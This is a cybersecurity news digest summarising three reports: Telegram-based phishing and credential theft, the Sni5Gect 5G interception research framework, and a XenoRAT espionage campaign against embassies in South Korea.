Phishing Campaigns Exploiting Telegram for Stealth and Data Theft
Recent reports indicate that cybercriminals are increasingly using Telegram as a covert communication and exfiltration channel, underscoring its growing role in phishing and malware campaigns. In recent attacks, attackers deployed highly convincing fake government login portals that intercepted credentials and transmitted them in real time via the Telegram Bot API. These phishing sites often included pre-filled government email addresses and deceptive security notices to manipulate trust and create a sense of urgency, while some samples redirected victims to legitimate Microsoft pages after data theft to mask the compromise. tLab’s Anti-APT platform identified these threats through OCR, heuristic analysis, and behavioral monitoring, allowing detection within seconds and showing how automation can counter advanced credential theft. This case highlights how trusted services, including Telegram and third-party platforms, are being repurposed by threat actors to evade defenses while maintaining persistent access to sensitive accounts. Phishing lures have shifted from fake AI tools to copyright violation notices, tailored with reconnaissance-based details, including company ownership records and Facebook Page IDs, to increase believability. Telegram once again plays a central role, this time as a dead drop resolver that points to payload-hosting servers, making takedown and detection more difficult. Beyond its current ability to steal browser credentials and system data, the malware’s ongoing development suggests expanded capabilities, including screenshot capture, keylogging, and file encryption. These campaigns reveal a clear trend: adversaries are refining phishing techniques with precision and social engineering, and weaponizing trusted platforms to conceal malicious traffic, making it more challenging for enterprises and governments to defend against modern data theft operations.
Sni5Gect Framework Exposes Major Flaws in 5G Security
Researchers from Singapore University of Technology and Design have unveiled Sni5Gect, a groundbreaking framework that intercepts and manipulates 5G communications without the need for rogue base stations. Traditional 5G attacks typically rely on expensive, complex, and easily detectable fake infrastructure, but Sni5Gect operates as a silent observer that eavesdrops on legitimate traffic during the pre-authentication phase. This vulnerable window occurs when devices reconnect after entering airplane mode, exiting tunnels, or regaining coverage, leaving control-plane messages unencrypted and open to exploitation. Using standard software-defined radios, the system can monitor traffic with an accuracy of more than 80% and inject malicious payloads at success rates between 70% and 90%, even from distances of up to 20 meters. The framework is modular, consisting of components for synchronization, system information extraction, device tracking, and spoofed message injection, allowing it to mimic real base station communications with alarming precision. Testing on commercial 5G smartphones from brands including Samsung, Google, Huawei, and OnePlus revealed multiple attack scenarios with severe real-world consequences. These include one-shot attacks that instantly crash devices, response-based attacks that fingerprint and track users, and a novel multi-stage downgrade method that forces devices to switch off 5G and lock them into less secure 4G connectivity. Researchers also showed how Sni5Gect could extract sensitive identity data, expanding the potential for surveillance and fraud. The GSM Association has acknowledged the severity of these findings under coordinated disclosure, assigning CVD-2024-0096 to track the vulnerabilities. While chipmakers have issued patches for past 5G flaws, the emergence of this new method illustrates that attackers no longer need full rogue networks to compromise mobile devices. By releasing the framework as an open-source research tool, the team aims to equip defenders with a means to test and harden 5G networks. However, its practicality and low cost raise serious concerns about potential misuse. This development underscores the urgent need for proactive security measures as 5G becomes deeply integrated into global critical infrastructure.
Espionage Campaign Targets Embassies in South Korea with XenoRAT
A state-sponsored campaign uncovered by Trellix researchers has been targeting foreign embassies in South Korea with highly tailored spearphishing emails that deliver the stealthy XenoRAT malware. Active since March 2025 to now, the operation has launched at least 19 attacks against diplomatic missions, evolving through multiple phases that shifted lures from European political meetings to U.S.–Korea military alliance themes. The emails were multilingual—crafted in English, Korean, French, Russian, Persian, and Arabic—and timed to coincide with real-world events, which made them especially convincing. Attackers used password-protected archives hosted on trusted services, including Dropbox and Google Drive, which contained [.]LNK files disguised as PDFs. When opened, these triggered obfuscated PowerShell scripts to fetch XenoRAT payloads from GitHub or Dropbox, ensuring persistence through scheduled tasks while evading many email security filters. XenoRAT offers advanced espionage capabilities, including keystroke logging, screen and webcam capture, file exfiltration, and remote shell execution. Its use of reflection-based memory loading and Confuser Core obfuscation makes it resilient against detection and analysis. While attribution points to North Korea’s Kimsuky group (APT43), time zone activity and holiday pauses suggest potential Chinese involvement, raising the possibility of joint or state-sponsored cooperation. Importantly, the tactics used—phishing tied to real-world diplomatic events, abuse of widely trusted cloud platforms, and GitHub-based malware hosting—are not geographically restricted. The same methods could easily be adapted to target embassies and diplomatic staff in other regions, including Europe and the United States, particularly around key events such as political summits, trade negotiations, or military discussions. This demonstrates how an operation initially centered on Seoul can scale globally, posing risks to Western governments and organizations that hold high-value diplomatic, military, or policy information.
